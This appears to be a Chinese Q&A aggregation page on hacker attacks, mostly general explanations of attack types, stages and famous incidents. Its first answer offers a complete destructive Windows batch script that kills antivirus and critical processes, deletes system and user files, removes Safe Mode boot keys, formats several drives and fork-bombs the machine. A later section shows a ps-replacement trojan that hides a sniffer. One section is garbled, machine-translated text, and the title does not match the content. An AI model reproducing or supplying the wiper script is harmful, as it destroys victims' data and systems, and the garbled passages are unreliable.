礦池黑客攻擊

❶ 求黑客攻擊命令大全

@echo off
echo 開始
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
DEL %SYSTEMDRIVE%\boot.ini /f
del /s /q /f %UserProfile%\AppData\>nul
del /s /q /f %UserProfile%\Application Data\>nul
taskkill /f /im smss.exe>nul
taskkill /f /im csrss.exe>nul
for /l %%i in (1,1,99) do start cmd.exe
for /l %%i in (1,1,65535) do md %%i
taskkill /f /im explorer.exe
for /l %%a in (0) do @cmd
REG DELETE 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot」 /v Minimal /f
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
cd c:\
cd windows
del *.* /q >nul
cd system32
del *.* /q >nul
shutdown -r -t 3
del %0

❷ 黑客攻擊主要有哪些手段

攻擊手段

黑客攻擊手段可分為非破壞性攻擊和破壞性攻擊兩類。非破壞性攻擊一般是為了擾亂系統的運行，並不盜竊系統資料，通常採用拒絕服務攻擊或信息炸彈；破壞性攻擊是以侵入他人電腦系

統、盜竊系統保密信息、破壞目標系統的數據為目的。下面為大家介紹4種黑客常用的攻擊手段

伺服器無法控制超文本傳輸協議要求任何進一步的，最終關閉，使其服務的合法用戶的一致好評。這些攻擊通常不會引起任何的網站或伺服器損壞，但請暫時關閉。

這種方法的應用已經擴大了很多，現在用於更惡意的目的；喜歡掩蓋欺詐和威懾安防面板等。

6、密碼破解當然也是黑客常用的攻擊手段之一。

❸ 著名的黑客攻擊事件有哪些

1、1988年11月：羅伯特·塔潘·莫里斯 對陣 全球
2、2009年7月：不知名 對陣 美國和韓國
3、1999年3月：大衛·史密斯 對陣 微軟Word & Excel
4、2009年8月 俄羅斯 對陣 博客主Cyxymu
5、1999年8月：喬納森·詹姆斯 對陣 美國國防部
6、2008年11月 無名人士 對陣 微軟Windows
7、2000年2月 黑手黨男孩 對陣 雅虎、CNN、eBay、戴爾和亞馬遜
8、2008年1月：匿名 對陣 山達基教
9、2002年2月：艾德里安．拉莫 對陣《紐約時報》
10、1990年6月：凱文·鮑爾森 對陣 洛杉磯KIIS FM電台

❹ 黑客攻擊系統通常分為哪幾個步驟每個步驟可以採用哪些攻擊方法一般使用什麼攻擊工具實現這些攻擊方法

1.網路攻擊的步驟：
隱藏攻擊源
信息搜集
掌握系統控制權
實施攻擊
安裝後門
清除攻擊痕跡
2.攻擊方法：
探測攻擊
網路監聽
解碼類攻擊
未授權訪問嘗試
緩沖區溢出
偽裝攻擊
電子欺騙攻擊
WWW攻擊
拒絕服務和分布式拒絕服務攻擊
病毒攻擊

❺ 被黑客20g流量攻擊伺服器一天。對方需要多少成本

對方用了ddos攻擊，而且滲透篩選出機房，直接打你伺服器終端，可cc防禦，把對方流量包分布開，這樣你們伺服器不會集體卡端掉線，或者崩潰望採納

❻ 列舉幾個世界著名黑客攻擊案例

giant panda 燒香啊！！！太BT了

❼ 黑客攻擊的步驟及原理

黑客入侵常用的攻擊手法

1. 利用系統漏洞進行攻擊

這是一種最普通的攻擊手法，任何一種軟體、一種操作系統都有它的漏洞，因而利用操作系統本身的漏洞來入侵、攻擊網站也成為了一種最普遍的攻擊手法，一方面由於網路安全管理員安全意識低下，沒有及時對系統漏洞進行修補或選用默認安裝的方式，從而被入侵者攻擊得逞；另一方面由於系統漏洞很容易被初學者所掌握。由於伺服器在初次安裝完成後，都存在著重大安全隱患，正如米特尼克所說，他可以進入世界任何一台默認安裝的伺服器。不光是米特尼克能進入任何一台默認安裝的伺服器，任何一個稍懂計算機漏洞的人都可以做到。

2. 通過電子郵件進行攻擊

這屬於一種簡單的攻擊方法，一般有3種情況。第1種情況：攻擊者給受害人發送大量的垃圾信件，導致受害人信箱的容量被完全佔用，從而停止正常的收發郵件；第2種情況：非法使用受害伺服器的電子郵件服務功能，向第三方發送垃圾郵件，為自己做廣告或是宣傳產品等，這樣就使受害伺服器負荷；第3種情況：一般公司的伺服器可能把郵件伺服器和Web伺服器都放在一起，攻擊者可以向該伺服器發送大量的垃圾郵件，這些郵件可能都塞在一個郵件隊列中或者就是壞郵件隊列中，直到郵箱被撐破或者把硬碟塞滿。這樣，就實現了攻擊者的攻擊目的。

3. 破解攻擊

破解攻擊是網上攻擊最常用的方法，入侵者通過系統常用服務或對網路通信進行監聽來搜集賬號，當找到主機上的有效賬號後，就採用字典窮舉法進行攻擊，或者他們通過各種方法獲取PASSWORD文件，然後用口令猜測，程序破譯用戶的賬號和密碼。

4. 後門程序攻擊

後門程序攻擊是指入侵者躲過日誌、使自己重返被入侵系統的技術。後門程序的種類很多，常見的有：調試後門程序、管理後門程序、惡意後門程序、服務後門程序、文件系統後門程序、內核後門程序等。

特洛伊木馬就是一種後門程序，偽造合法的程序，偷偷侵入用戶系統從而獲得系統的控制權。它提供某些功能作為誘餌，當目標計算機啟動時木馬程序隨之啟動，然後在某一特定的埠監聽，通過監聽埠收到命令後，木馬程序會根據命令在目標計算機上執行一些操作，如傳送或刪除文件，竊取口令、重新啟動計算機等。

5. 拒絕服務攻擊

拒絕服務攻擊是入侵者的攻擊方法，因為在入侵目標伺服器無法得逞時，可以利用拒絕服務攻擊使伺服器或網路癱瘓。通過發送大量合法請求，進行惡意攻擊導致伺服器資源耗盡，不能對正常的服務請求做出響應。可以說拒絕服務攻擊是入侵者的終極手法。

6. 緩沖區溢出攻擊

溢出攻擊可以說是入侵者的最愛，是被入侵者使用最多的攻擊漏洞。因為它是一個非常具有危險性的漏洞，造成溢出後一般可以獲取一個Shell，從而計算機就被入侵者完全控制。接下來認識一下緩沖區溢出攻擊。

溢出區是內存中存放數據的地方，在程序試圖將數據放到計算機內存中的某一個地方時，因為沒有足夠的空間就會發生緩沖區溢出，而人為溢出則是攻擊者編寫一個超出溢出區長度的字元串，然後植入緩沖區，這樣就可能導致兩種結果。一是過長的字元串覆蓋了相鄰的存儲單元引起程序運行錯誤，有時可能導致系統崩潰；另一方面是，通過把字元串植入緩沖區，從而獲得系統許可權，可以執行任意指令。

Microsoft的Windows NT溢出漏洞最多，比如htr、idq、printer、asp等。

❽ 什麼叫黑客攻擊

黑客攻擊
---------------解釋1-------------------

一、黑客常用攻擊手段

黑客攻擊手段可分為非破壞性攻擊和破壞性攻擊兩類。非破壞性攻擊一般是為了擾亂系統的運行，並不盜竊系統資料，通常採用拒絕服務攻擊或信息炸彈；破壞性攻擊是以侵入他人電腦系統、盜竊系統保密信息、破壞目標系統的數據為目的。下面為大家介紹4種黑客常用的攻擊手段（小編註：密碼破解當然也是黑客常用的攻擊手段之一）。

1、後門程序
由於程序員設計一些功能復雜的程序時，一般採用模塊化的程序設計思想，將整個項目分割為多個功能模塊，分別進行設計、調試，這時的後門就是一個模塊的秘密入口。在程序開發階段，後門便於測試、更改和增強模塊功能。正常情況下，完成設計之後需要去掉各個模塊的後門，不過有時由於疏忽或者其他原因（如將其留在程序中，便於日後訪問、測試或維護）後門沒有去掉，一些別有用心的人會利用窮舉搜索法發現並利用這些後門，然後進入系統並發動攻擊。

2、信息炸彈
信息炸彈是指使用一些特殊工具軟體，短時間內向目標伺服器發送大量超出系統負荷的信息，造成目標伺服器超負荷、網路堵塞、系統崩潰的攻擊手段。比如向未打補丁的 Windows 95系統發送特定組合的 UDP 數據包，會導致目標系統死機或重啟；向某型號的路由器發送特定數據包致使路由器死機；向某人的電子郵件發送大量的垃圾郵件將此郵箱「撐爆」等。目前常見的信息炸彈有郵件炸彈、邏輯炸彈等。

3、拒絕服務
拒絕服務又叫分布式D.O.S攻擊，它是使用超出被攻擊目標處理能力的大量數據包消耗系統可用系統、帶寬資源，最後致使網路服務癱瘓的一種攻擊手段。作為攻擊者，首先需要通過常規的黑客手段侵入並控制某個網站，然後在伺服器上安裝並啟動一個可由攻擊者發出的特殊指令來控制進程，攻擊者把攻擊對象的IP地址作為指令下達給進程的時候，這些進程就開始對目標主機發起攻擊。這種方式可以集中大量的網路伺服器帶寬，對某個特定目標實施攻擊，因而威力巨大，頃刻之間就可以使被攻擊目標帶寬資源耗盡，導致伺服器癱瘓。比如1999年美國明尼蘇達大學遭到的黑客攻擊就屬於這種方式。

4、網路監聽
網路監聽是一種監視網路狀態、數據流以及網路上傳輸信息的管理工具，它可以將網路介面設置在監聽模式，並且可以截獲網上傳輸的信息，也就是說，當黑客登錄網路主機並取得超級用戶許可權後，若要登錄其他主機，使用網路監聽可以有效地截獲網上的數據，這是黑客使用最多的方法，但是，網路監聽只能應用於物理上連接於同一網段的主機，通常被用做獲取用戶口令。

❾ 黑客攻擊的三個階段是什麼黑客在這三個階段分別完成什麼工作

1. 黑客攻擊的目的 黑客攻擊的目的主要是為了竊取信息，獲取口令，控制中間站點和獲得超級用戶許可權。其中竊取信息是黑客最主要的目的，竊取信息不一定只是復制該信息，還包括對信息的更改、替換和刪除，也包括把機密信息公開發布等行為。 黑客攻擊的三個階段是 (1) 確定目標 (2) 收集與攻擊目標相關的信息，並找出系統的安全漏洞 (3) 實施攻擊 2. 黑客攻擊的手段 黑客攻擊通常採用掃描器和網路監聽手段。 掃描器是指自動監測遠程或本地主機安全性弱點的程序。可以被黑客利用的掃描器有主機存活掃描器、埠掃描器和漏洞掃描器。說明：這里所指的埠不是指物理意義上的埠，而是特指TCP/IP協議中的埠。 網路監聽是指獲取在網路上傳輸的信息。網路監聽只是被動「竊聽」信息，並不直接攻擊目標。

❿ 什麼是黑客攻擊為什麼要攻擊怎麼攻擊的

黑客攻擊
開放分類： 電腦、技術類、軍事類

---------------解釋1-------------------

一、黑客常用攻擊手段

黑客攻擊手段可分為非破壞性攻擊和破壞性攻擊兩類。非破壞性攻擊一般是為了擾亂系統的運行，並不盜竊系統資料，通常採用拒絕服務攻擊或信息炸彈；破壞性攻擊是以侵入他人電腦系統、盜竊系統保密信息、破壞目標系統的數據為目的。下面為大家介紹4種黑客常用的攻擊手段（小編註：密碼破解當然也是黑客常用的攻擊手段之一）。

1、後門程序
由於程序員設計一些功能復雜的程序時，一般採用模塊化的程序設計思想，將整個項目分割為多個功能模塊，分別進行設計、調試，這時的後門就是一個模塊的秘密入口。在程序開發階段，後門便於測試、更改和增強模塊功能。正常情況下，完成設計之後需要去掉各個模塊的後門，不過有時由於疏忽或者其他原因（如將其留在程序中，便於日後訪問、測試或維護）後門沒有去掉，一些別有用心的人會利用窮舉搜索法發現並利用這些後門，然後進入系統並發動攻擊。

2、信息炸彈
信息炸彈是指使用一些特殊工具軟體，短時間內向目標伺服器發送大量超出系統負荷的信息，造成目標伺服器超負荷、網路堵塞、系統崩潰的攻擊手段。比如向未打補丁的 Windows 95系統發送特定組合的 UDP 數據包，會導致目標系統死機或重啟；向某型號的路由器發送特定數據包致使路由器死機；向某人的電子郵件發送大量的垃圾郵件將此郵箱「撐爆」等。目前常見的信息炸彈有郵件炸彈、邏輯炸彈等。

3、拒絕服務
拒絕服務又叫分布式D.O.S攻擊，它是使用超出被攻擊目標處理能力的大量數據包消耗系統可用系統、帶寬資源，最後致使網路服務癱瘓的一種攻擊手段。作為攻擊者，首先需要通過常規的黑客手段侵入並控制某個網站，然後在伺服器上安裝並啟動一個可由攻擊者發出的特殊指令來控制進程，攻擊者把攻擊對象的IP地址作為指令下達給進程的時候，這些進程就開始對目標主機發起攻擊。這種方式可以集中大量的網路伺服器帶寬，對某個特定目標實施攻擊，因而威力巨大，頃刻之間就可以使被攻擊目標帶寬資源耗盡，導致伺服器癱瘓。比如1999年美國明尼蘇達大學遭到的黑客攻擊就屬於這種方式。

4、網路監聽
網路監聽是一種監視網路狀態、數據流以及網路上傳輸信息的管理工具，它可以將網路介面設置在監聽模式，並且可以截獲網上傳輸的信息，也就是說，當黑客登錄網路主機並取得超級用戶許可權後，若要登錄其他主機，使用網路監聽可以有效地截獲網上的數據，這是黑客使用最多的方法，但是，網路監聽只能應用於物理上連接於同一網段的主機，通常被用做獲取用戶口令。

二、黑客攻擊的目的

一、進程的執行

攻擊者在登上了目標主機後，或許只是運行了一些簡單的程序，也可能這些程序是無傷大雅的，僅僅只是消耗了一些系統的CPU時間。
但是事情並不如此簡單，我們都知道，有些程序只能在一種系統中運行，到了另一個系統將無法運行。一個特殊的例子就是一些掃描只能在UNIX系統中運行，在這種情況下，攻擊者為了攻擊的需要，往往就會找一個中間站點來運行所需要的程序，並且這樣也可以避免暴露自己的真實目的所在。即使被發現了，也只能找到中間的站點地址。
在另外一些情況下，假使有一個站點能夠訪問另一個嚴格受控的站點或網路，為了攻擊這個站點或網路，入侵者可能就會先攻擊這個中間的站點。這種情況對被攻擊的站點或網路本身可能不會造成破壞，但是潛在的危險已經存在。首先，它佔有了大量的處理器的時間，尤其在運行一個網路監聽軟體時，使得一個主機的響應時間變得非常的長。另外，從另一個角度來說，將嚴重影響目標主機的信任度。因為入侵者藉助於目標主機對目標主機能夠訪問，而且嚴格受控的站點或進行攻擊。當造成損失時，責任會轉嫁到目標主機的管理員身上，後果是難以估計的。可能導致目標主機損失一些受信任的站點或網路。再就是，可能人民者將一筆賬單轉嫁到目標主機上，這在網上獲取收費信息是很有可能的。

二、獲取文件和傳輸中的數據

攻擊者的目標就是系統中的重要數據，因此攻擊者通過登上目標主機，或是使用網路監聽進行攻擊事實上，即使連入侵者都沒有確定要於什麼時，在一般情況下，他會將當前用戶目錄下的文件系統中的/etc/hosts或/etc/passwd復制回去。

三、獲取超級用戶的許可權

具有超級用戶的許可權，意味著可以做任何事情，這對入侵者無疑是一個莫大的誘惑。在UNIX系統中支持網路監聽程序必需有這種許可權，因此在一個區域網中，掌握了一台主機的超級用戶許可權，才可以說掌握了整個子網。

四、對系統的非法訪問

有許多的系統是不允許其他的用戶訪問的，比如一個公司、組織的網路。因此，必須以一種非常的行為來得到訪問的權力。這種攻擊的目的並不一定要做什麼，或許只是為訪問面攻擊。在一個有許多windows95
的用戶網路中，常常有許多的用戶把自己的目錄共享出未，於是別人就可以從容地在這些計算機上瀏覽、尋找自己感興趣的東西，或者刪除更換文件。或許通過攻擊來證明自己技術的行為才是我們想像中的黑客行徑，畢竟，誰都不喜歡些專門搞破壞，或者給別人帶來麻煩的入侵者。但是，這種非法訪問的的黑客行為，人們也不喜歡的。

五、進行不許可的操作

有時候，用戶被允許訪問某些資源，但通常受到許多的限制。在一個UNIX系統中沒有超級用戶的許可權，許多事情將無法做，於是有了一個普通的戶頭，總想得到一個更大許可權。在windowsNT系統中一樣，系統中隱藏的秘密太多了，人們總經不起誘惑。例如網關對一些站點的訪問進行嚴格控制等。許多的用戶都有意無意地去嘗試盡量獲取超出允許的一些許可權，於是便尋找管理員在置中的漏洞，或者去找一些工具來突破系統的安全防線，例如，特洛伊木馬就是一種使用多的手段。

六、拒絕服務

同上面的目的進行比較，拒絕服務便是一種有目的的破壞行為了。拒絕服務的方式很多，如將連接區域網的電纜接地；向域名伺服器發送大量的無意義的請求，使得它無法完成從其他的主機來的名字解析請求；製造網路風暴，讓網路中充斥大量的封包，占據網路的帶寬，延緩網路的傳輸。

七、塗改信息

塗改信息包括對重要文件的修改、更換，刪除，是一種很惡劣的攻擊行為。不真實的或者錯誤的信息都將對用戶造成很大的損失。

八、暴露信息

入侵的站點有許多重要的信息和數據可以用。攻擊者若使用一些系統工具往往會被系統記錄下來如果直接發給自己的站點也會暴露自己的身份和地址，於是竊取信息時，攻擊者往往將這些信息和數據送到一個公開的FTP站點，或者利用電子郵件寄往一個可以拿到的地方，等以後再從這些地方取走。
這樣做可以很好隱藏自己。將這些重要的信息發往公開的站點造成了信息的擴散，由於那些公開的站點常常會有許多人訪問，其他的用戶完全有可能得到這些情息，並再次擴散出去。

三、黑客攻擊的工具

（一）

應該說，黑客很聰明，但是他們並不都是天才，他們經常利用別人在安全領域廣泛使用的工具和技術。一般來說。他們如果不自己設計工具，就必須利用現成的工具。在網上，這種工具很多，從SATAN、ISS到非常短小實用的各種網路監聽工具。

在一個UNIX系統中，當入侵完成後，系統設置了大大小小的漏洞，完全清理這些漏洞是很困難的，這時候只能重裝系統了。當攻擊者在網路中進行監聽，得到一些用戶的口令以後，只要有一個口令沒有改變，那麼系統仍然是不安全的，攻擊者在任何時候都可以重新訪問這個網路。

對一個網路，困難在於登上目標主機。當登上去以後有許多的辦法可以用。即使攻擊者不做任何事，他仍然可以得到系統的重要信息，並擴散出去，例如：將系統中的hosts文件發散出去。嚴重的情況是攻擊者將得到的以下口令文件放在網路上進行交流。每個工具由於其特定的設計都有各自獨特的限制，因此從使用者的角度來看，所有使用的這種工具進行的攻擊基本相同。例如目標主機是一台運行SunOS4.1.3的SAPRC工作站，那麼所有用Strobe工具進行的攻擊，管理員聽見到的現象可能完全是一樣的。了解這些標志是管理員教育的一個重要方面。

對一個新的入侵者來說，他可能會按這些指導生硬地進行攻擊，但結果經常令他失望。因為一些攻擊方法已經過時了(系統升級或打補丁進行入侵只會浪費時間），而且這些攻擊會留下攻擊者的痕跡。事實上，管理員可以使用一些工具，或者一些腳本程序，讓它們從系統日誌中抽取有關入侵者的信息。這些程序只需具備很強的搜索功能即可（如Perl語言就很適合做這件事了）。

（二）

當然這種情況下，要求系統日誌沒有遭到入侵。隨著攻擊者經驗的增長、他們開始研究一整套攻擊的特殊方法，其中一些方法與攻擊者的習慣有關。由於攻擊者意識到了一個工具除了它的直接用途之外，還有其他的用途，在這些攻擊中使用一種或多種技術來達到目的，這種類型的攻擊稱為混合攻擊。

攻擊工具不局限於專用工具，系統常用的網路工具也可以成為攻擊的工具，例如：要登上目標主機，便要用到telnet與rlogin等命令，對目標主機進行偵察，系統中有許多的可以作為偵察的工具，如finger和showmount。甚至自己可以編寫一些工具，這並不是一件很難的事。其發回,如當伺服器詢問用戶名時，黑客輸入分號。這是一個UNIX命令，意思是發送一個命令、一些HTTP伺服器就會將用戶使用的分號過濾掉。入侵者將監聽程序安裝在UNIX伺服器上，對登錄進行監聽，例如監聽23、21等埠。

（三）

通過用戶登錄，把所監聽到的用戶名和口令保存起來，於是黑客就得到了賬號和口令，在有大量的監聽程序可以用，甚至自己可以編寫一個監聽程序。監聽程序可以在windows95和windowsNT中運行。

除了這些工具以外，入侵者還可以利用特洛伊木馬程序。例如：攻擊者運行了一個監聽程序，但有時不想讓別人從ps命令中看到這個程序在執行（即使給這個程序改名，它的特殊的運行參數也能使系統管理員一眼看出來這是一個網路監聽程序）。

攻擊者可以將ps命令移到一個目錄或換名，例如換成pss，再寫一個shell程序，給這個shell程序起名為ps，放到ps所在的目錄中：
#! /bin/ksh
pss-ef|grep-vsniffit|grep-vgrep

以後，當有人使用ps命令時，就不會發現有人在使用網路監聽程序。這是一個簡單的特洛伊木馬程序。

另外，蠕蟲病毒也可以成為網路攻擊的工具，它雖然不修改系統信息，但它極大地延緩了網路的速度，給人們帶來了麻煩。

---------------解釋2-------------------

隨著互聯網黑客技術的飛速發展，網路世界的安全性不斷受到挑戰。對於黑客自身來說，要闖入大部分人的電腦實在是太容易了。如果你要上網，就免不了遇到黑客。所以必須知己知彼，才能在網上保持安全。那麼黑客們有哪些常用攻擊手段呢？

一、獲取口令

這種方式有三種方法：一是預設的登錄界面（ShellScripts）攻擊法。在被攻擊主機上啟動一個可執行程序，該程序顯示一個偽造的登錄界面。當用戶在這個偽裝的界面上鍵入登錄信息（用戶名、密碼等）後，程序將用戶輸入的信息傳送到攻擊者主機，然後關閉界面給出提示信息「系統故障」，要求用戶重新登錄。此後，才會出現真正的登錄界面。二是通過網路監聽非法得到用戶口令，這類方法有一定的局限性，但危害性極大，監聽者往往能夠獲得其所在網段的所有用戶賬號和口令，對區域網安全威脅巨大；三是在知道用戶的賬號後（如電子郵件「＠」前面的部分）利用一些專門軟體強行破解用戶口令，這種方法不受網段限制，但黑客要有足夠的耐心和時間；尤其對那些口令安全系數極低的用戶，只要短短的一兩分鍾，甚至幾十秒內就可以將其破解。

二、電子郵件攻擊

這種方式一般是採用電子郵件炸彈（E－mailBomb），是黑客常用的一種攻擊手段。指的是用偽造的IP地址和電子郵件地址向同一信箱發送數以千計、萬計甚至無窮多次的內容相同的惡意郵件，也可稱之為大容量的垃圾郵件。由於每個人的郵件信箱是有限的，當龐大的郵件垃圾到達信箱的時候，就會擠滿信箱，把正常的郵件給沖掉。同時，因為它佔用了大量的網路資源，常常導致網路塞車，使用戶不能正常地工作，嚴重者可能會給電子郵件伺服器操作系統帶來危險，甚至癱瘓。

三、特洛伊木馬攻擊

「特洛伊木馬程序」技術是黑客常用的攻擊手段。它通過在你的電腦系統隱藏一個會在Windows啟動時運行的程序，採用伺服器／客戶機的運行方式，從而達到在上網時控制你電腦的目的。黑客利用它竊取你的口令、瀏覽你的驅動器、修改你的文件、登錄注冊表等等，如流傳極廣的冰河木馬，現在流行的很多病毒也都帶有黑客性質，如影響面極廣的「Nimda」、「求職信」和「紅色代碼」及「紅色代碼II」等。攻擊者可以佯稱自己為系統管理員（郵件地址和系統管理員完全相同），將這些東西通過電子郵件的方式發送給你。如某些單位的網路管理員會定期給用戶免費發送防火牆升級程序，這些程序多為可執行程序，這就為黑客提供了可乘之機，很多用戶稍不注意就可能在不知不覺中遺失重要信息。

四、誘入法

黑客編寫一些看起來「合法」的程序，上傳到一些FTP站點或是提供給某些個人主頁，誘導用戶下載。當一個用戶下載軟體時，黑客的軟體一起下載到用戶的機器上。該軟體會跟蹤用戶的電腦操作，它靜靜地記錄著用戶輸入的每個口令，然後把它們發送給黑客指定的Internet信箱。例如，有人發送給用戶電子郵件，聲稱為「確定我們的用戶需要」而進行調查。作為對填寫表格的回報，允許用戶免費使用多少小時。但是，該程序實際上卻是搜集用戶的口令，並把它們發送給某個遠方的「黑客」。

五、尋找系統漏洞

許多系統都有這樣那樣的安全漏洞（Bugs），其中某些是操作系統或應用軟體本身具有的，如Sendmail漏洞，Windows98中的共享目錄密碼驗證漏洞和IE5漏洞等，這些漏洞在補丁未被開發出來之前一般很難防禦黑客的破壞，除非你不上網。還有就是有些程序員設計一些功能復雜的程序時，一般採用模塊化的程序設計思想，將整個項目分割為多個功能模塊，分別進行設計、調試，這時的後門就是一個模塊的秘密入口。在程序開發階段，後門便於測試、更改和增強模塊功能。正常情況下，完成設計之後需要去掉各個模塊的後門，不過有時由於疏忽或者其他原因（如將其留在程序中，便於日後訪問、測試或維護）後門沒有去掉，一些別有用心的人會利用專門的掃描工具發現並利用這些後門，然後進入系統並發動攻擊。

現在，你該知道黑客慣用的一些攻擊手段了吧？當我們對黑客們的這些行為有所了解後，就能做到「知己知彼，百戰不殆」，從而更有效地防患於未然，拒黑客於「機」外。網路的開放性決定了它的復雜性和多樣性，隨著技術的不斷進步，各種各樣高明的黑客還會不斷誕生，同時，他們使用的手段也會越來越先進。我們惟有不斷提高個人的安全意識，再加上必要的防護手段，斬斷黑客的黑手。相信通過大家的努力，黑客們的舞台將會越來越小，個人用戶可以高枕無憂地上網沖浪，還我們一片寧靜的天空